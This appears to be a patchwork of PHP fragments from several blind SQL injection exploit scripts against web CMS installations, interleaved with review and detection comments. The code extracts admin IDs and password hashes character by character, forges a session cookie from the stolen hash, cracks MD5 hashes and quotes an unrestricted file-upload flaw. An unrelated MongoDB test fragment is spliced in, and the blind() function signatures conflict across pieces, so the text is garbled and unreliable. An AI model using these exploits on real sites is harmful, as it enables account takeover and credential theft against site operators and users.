// Response pattern used to recognise a successful upload; overridable via the 'upmatch'
// parameter. The default is preg-escaped and looks like a meta-refresh URL to the files page.
$match_upload = getparam('upmatch') != '' ? getparam('upmatch') : '\\;URL\\=index\\.php\\?site\\=files\\&file\\=';
// Injection point for the blind extraction below; overridable via 'sqlmatch'.
$match_blindsql = getparam('sqlmatch') != '' ? getparam('sqlmatch') : 'site\\=profile\\&id\\=';
// Optional outbound proxy and proxy credentials (only applied when non-empty).
$proxy = getparam('proxy');
$authp = getparam('proxyauth');
$xpl = new phpsploit();
$xpl->agent("Mozilla Firefox");
if ($proxy) {
    $xpl->proxy($proxy);
}
if ($authp) {
    $xpl->proxyauth($authp);
}
// blind() is defined elsewhere in this file; here it is called with a single argument,
// presumably the column to read.
print "\nAdmin id: ";
$userid = blind('userID');
print "\nAdmin hash: ";
$passwd = strtolower(blind('password'));
// The ws_auth cookie is assembled as "<userID>%3A<password hash>" — the script relies on the
// stored hash doubling as the session secret, so no cracking step is needed here.
// Application-side fix: issue a random, server-side session token instead of deriving the
// cookie from stored credentials.
print "\nLogged in (ws_auth={$userid}%3A{$passwd})";
$xpl->addcookie("ws_auth", $userid . "%3A" . $passwd);
# File upload vulnerability
#
# +files.php
# |
# 42. $action = $_GET['action'];
# 43. if($action=="save") {
# 44. if(!isfileadmin($userID)) die(redirect("index.php?site=files", "no access!", "3"));
# 46. $upfile = $_FILES[upfile];
# 69. $filepath = "./downloads/";
# 71. $des_file = $filepath.$upfile[name];
# 72. if(!file_exists($des_file)) {
# 73. if(move_uploaded_file($upfile[tmp_name], $des_file)) {
#
# Review note: line 71 builds the destination path from the client-supplied filename with
# no basename() or extension check; line 44 restricts only *who* may upload, not *what*.
# The application-side fix is to generate the stored name server-side, whitelist allowed
# extensions, and keep the download directory non-executable.
/**
 * Recursive binary search for the numeric value behind $sn, using check() as a boolean
 * oracle ("is the value > $compare?").
 *
 * The window [$fmin, $fmax] is halved on each call until it is narrower than 5; the
 * remaining candidates are then handed to crack($fmin, $fmax, $sn). If crack() returns 0
 * the attempt is reported as failed and credits() is called. No branch returns a value —
 * presumably crack() prints the result itself (its definition is not shown here; confirm).
 *
 * @param mixed $sn   identifier passed through unchanged to check() and crack()
 * @param int   $fmin lower bound of the search window
 * @param int   $fmax upper bound of the search window
 * @return void
 *
 * Detection note: each check() call presumably issues one request carrying a "> N"
 * comparison on the same parameter, so a burst of near-identical requests that differ only
 * in that number is the log signature of this probe.
 */
function blind($sn, $fmin, $fmax)
{
    if ($fmax - $fmin < 5) {
        if (crack($fmin, $fmax, $sn) == 0) {
            print "\n\rEXPLOIT FAILED...";
            credits();
        }
        return;
    }
    // Midpoint of the window; intval() truncates when the width is odd.
    $compare = intval($fmin + ($fmax - $fmin) / 2);
    $crcheck = ">" . $compare;
    if (check($crcheck, $sn) == 1) {
        // value > $compare: keep the upper half
        blind($sn, $compare, $fmax);
    } else {
        // value <= $compare: keep the lower half
        blind($sn, $fmin, $compare + 1);
    }
}
if (!preg_match("#NO HACK#i", $xpl->getcontent())) { print "[*] Attack failed.\n\n"; break; } print "[*] Login:\t"; $login = blind("email", $i); if ($login == "") { if ($i == 0) { print "\r[*] Attack failed.\n\n"; } else { print "\r[*] Attack failed (if you crack a hash, use -admin param).\n\n"; } break; } print "\n[*] Hash:\t"; $passwd = blind("mot_passe", $i); print "\n"; $md5 = strtolower($passwd); for ($a = 0; $a < sizeof($md5loc); $a++) { $r = crack($md5loc[$a][0], $md5loc[$a][1], $md5loc[$a][2]); if ($r) { print "[*] Password:\t{$r}\n"; break; } } if (!$r) { print "[*] Can't find the hash on the net, sorry.\n"; } else { attack($login, $r); die; }
/**
 * Second attack stage: read the admin's session id and user id — or, failing that, the
 * stored credential rows — via blind().
 *
 * Reads the globals $queries (label/query pairs indexed 0..3) and $mode; writes the
 * globals $admin_sid and $admin_uid. blind() is called as (query, 20|50, 48, 122): the
 * second argument is presumably a maximum length, and 48..122 are the ASCII codes of
 * '0'..'z', i.e. the per-character search range. blind() is defined elsewhere in this
 * file and appears to print as it goes — confirm.
 *
 * Flow:
 *   mode != 2: extract $queries[0] into $admin_sid; if empty, print $queries[2..3]
 *              (length 50) and exit(); otherwise extract $queries[1] into $admin_uid and
 *              call finalattack($admin_sid, $admin_uid).
 *   mode == 2: print $queries[2..3] (length 50) and exit().
 *
 * Review note: the $queries[2..3] loop is duplicated verbatim in both branches, and the
 * results of those blind() calls are not captured. Defensive takeaway from the fallback
 * message: the target stores MD5 password hashes, which are cheap to crack offline — a
 * slow, salted algorithm (password_hash()) would remove that fallback.
 */
function attack2()
{
    global $queries, $mode, $admin_sid, $admin_uid;
    print "[*] Attack #2\n";
    if ($mode != 2) {
        print " " . $queries[0][0] . " -> ";
        $admin_sid = blind($queries[0][1], 20, 48, 122);
        if ($admin_sid == "") {
            // No session value came back: fall through to the credential rows and stop.
            print "\r[*] No session found. Crack following MD5 hash and use -admin param.\n";
            for ($i = 2; $i < 4; $i++) {
                print " " . $queries[$i][0] . " -> ";
                blind($queries[$i][1], 50, 48, 122);
                print "\n";
            }
            exit;
        } else {
            print "\n " . $queries[1][0] . " -> ";
            $admin_uid = blind($queries[1][1], 20, 48, 122);
            print "\n";
            finalattack($admin_sid, $admin_uid);
        }
    } else {
        // Same credential dump as the fallback above, selected explicitly by mode 2.
        print "\r[*] Getting admin credentials\n";
        for ($i = 2; $i < 4; $i++) {
            print " " . $queries[$i][0] . " -> ";
            blind($queries[$i][1], 50, 48, 122);
            print "\n";
        }
        exit;
    }
}
var_dump($result); } catch (MongoCursorException $e) { echo "EXCEPTION: " . $e->getMessage() . "\n"; } } $m = new Mongo("mongodb://localhost:27017", array("replicaSet" => true)); $server = array(new Mongo("localhost:27017"), new Mongo("localhost:27018"), new Mongo("localhost:27019")); $count = 0; while (true) { usleep(100); $op = rand(0, 1000); switch ($op) { case 0: case 1: case 2: blind($server[$op]); break; case 3: case 4: case 5: case 6: case 7: case 8: unblind($server[$op % 3]); break; case 9: stepDown(); break; case 10: remove(); break;
/**
 * Read one field of the admin record character by character.
 *
 * First sends a sanity probe built by makeExpl($param, 'BETWEEN 48 AND 122', 1) — "is
 * character 1 within '0'..'z'?" — and gives up with "failed..." if check() reports 0,
 * which indicates the injection point is not behaving as an oracle. It then walks
 * positions $sn = 1.. while blind($param, $sn, $min, $max) !== 0, stopping after 32
 * positions (presumably the length of an MD5 hex digest — confirm against the target's
 * password storage).
 *
 * @param string $param name of the field to extract
 * @return void results are not returned; blind() presumably prints them (not shown here)
 *
 * Detection note: the name $sql_cookies suggests the payload travels in a cookie;
 * "BETWEEN n AND m" and comparison operators inside cookie values are a cheap WAF/log
 * signature for this kind of probe.
 */
function exploit($param)
{
    echo "\nLet's define admin's " . $param . "\n";
    $min = 48; # ASCII '0' — lower bound of the character search range
    $max = 122; # ASCII 'z' — upper bound
    // Oracle sanity check: this comparison should hold for any character in the expected
    // range, so a 0 here means the injection is not working rather than "no data".
    $sql_cookies = makeExpl($param, 'BETWEEN ' . $min . ' AND ' . $max, 1);
    if (check($sql_cookies) == 0) {
        echo 'failed...';
        return;
    }
    $sn = 1;
    // One blind() call per character position until it reports 0 or 32 positions are done.
    while (blind($param, $sn, $min, $max) !== 0) {
        $sn++;
        if ($sn > 32) {
            return;
        }
    }
}